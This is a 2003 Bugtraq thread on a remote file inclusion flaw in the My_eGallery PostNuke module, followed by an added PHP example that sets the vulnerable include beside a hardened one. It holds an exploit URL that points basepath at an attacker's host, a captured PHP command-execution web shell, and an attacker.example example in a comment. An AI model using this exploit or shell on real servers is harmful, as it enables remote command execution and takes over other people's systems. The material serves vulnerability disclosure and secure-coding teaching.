Re: Remote execution in My_eGallery

From: Fauvet Ludovic (etix_at_runbox.com)
Date: 11/30/03

  • Next message: Jay Gates: "Re: phpBB 2.06 search.php SQL injection"
    Date: Sun, 30 Nov 2003 01:16:31 +0100
    To: bugtraq@securityfocus.com
    
    

    Hi,
    There are some PHP scripts which are vulnerable.
    One of these is displayCategory.php.
    So you just have to go to:
    http://www.[vulnerable].com/modules/My_eGallery/public/displayCategory.php?basepath=http://[youwebsite].com
    And create a directory "public" in the root of your website and put a
    file named imageFunctions.php with the code you want to inject.

    -- 
    /*-------------------
    Best regards,
    [::eTiX::]
    (Fauvet Ludovic)
    -------------------*/
    Bojan Zdrnja wrote:
    > Product: My_eGallery
    > Versions affected: all <3.1.1.g
    > Website: http://lottasophie.sourceforge.net/index.php
    > 
    > 1. Introduction
    > ---------------
    > 
    > My_eGallery is a very nice PostNuke module, which allows users to create and
    > manipulate their own galleries on the web, plus offers various additional
    > features.
    > For more information and a demonstration you can go to the Website above.
    > 
    > 2. Exploit
    > ----------
    > 
    > Any version of My_eGallery, prior to 3.1.1.g, is susceptible to this
    > vulnerability.
    > 
    > Certain PHP files have parameters which are used, unfiltered, in include
    > functions.
    > An intruder can craft PHP code on their Web site and supply a parameter to
    > My_eGallery so it actually includes the malicious PHP code.
    > 
    > The following code was captured as being used in the wild (edited
    > intentionally):
    > 
    > <?
    >   // CMD - To Execute Command on File Injection Bug ( gif - jpg - txt )
    >   if (isset($chdir)) @chdir($chdir);
    >   ob_start();
    >   execute("$cmd 1> /tmp/cmdtemp 2>&1; cat /tmp/cmdtemp; rm /tmp/cmdtemp");
    >   $output = ob_get_contents();
    >   ob_end_clean();
    >   print_output();
    > ?>
    > 
    > This allows execution of any command on the server with My_eGallery, under
    > the privileges of the Web server (usually apache or httpd).
    > 
    > 
    > 3. Solution
    > -----------
    > 
    > The vendor was contacted and promptly replied. A fix is available at the
    > vendor's site:
    > 
    > http://lottasophie.sourceforge.net/modules.php?op=modload&name=Downloads&file=index&req=viewdownload&cid=5
    > 
    > As this was seen being exploited in the wild, users are urged to upgrade to
    > the latest version as soon as possible.
    > 
    > 
    > 
    > 
    > Regards,
    > 
    > Bojan Zdrnja
    > CISSP
    > 
    > 
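The include pattern the advisory describes, with a request-controlled path reaching an include, beside a hardened form, as an added PHP example that is not My_eGallery's own code; the file layout (public/imageFunctions.php under the module directory) follows the posts above, while the function names, the register_globals assumption and the use of realpath() are assumptions.

```php
<?php
// Added illustration, not My_eGallery's own code: the include pattern the
// advisory describes (a request-controlled path reaching an include),
// beside a hardened replacement. Function names are assumptions.

// VULNERABLE (assumed shape of displayCategory.php): with register_globals
// on, ?basepath=http://attacker.example fills $basepath, and include will
// fetch and run http://attacker.example/public/imageFunctions.php whenever
// allow_url_fopen (and, on later PHP, allow_url_include) permits it.
function load_image_functions_vulnerable($basepath)
{
    include "$basepath/public/imageFunctions.php";
}

// HARDENED: never derive an include path from request data. Resolve the
// helper relative to this file and refuse anything that carries a URL
// scheme or leaves the module directory.
function resolve_module_file($relative)
{
    $moduleDir = realpath(__DIR__);          // e.g. .../modules/My_eGallery
    // Reject URL schemes ("http://", "php://", "ftp://") and NUL bytes outright.
    if (preg_match('#^[a-z][a-z0-9+.-]*://#i', $relative) || strpos($relative, "\0") !== false) {
        return false;
    }
    $candidate = realpath($moduleDir . '/' . $relative);
    // realpath() collapses "../"; require the result to stay under $moduleDir.
    if ($candidate === false || strncmp($candidate, $moduleDir . DIRECTORY_SEPARATOR, strlen($moduleDir) + 1) !== 0) {
        return false;
    }
    return $candidate;
}

function load_image_functions_hardened()
{
    $file = resolve_module_file('public/imageFunctions.php');
    if ($file === false) {
        // Fail closed: a missing or out-of-tree helper is a deployment error,
        // not something a visitor should be able to influence.
        trigger_error('imageFunctions.php not found under the module directory', E_USER_ERROR);
        return;
    }
    require_once $file;
}
```

The simplest fix is to stop reading basepath from the request at all; the validator only matters where a configurable base directory is genuinely needed, and even then disabling remote includes in php.ini removes the whole class of bug.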
    
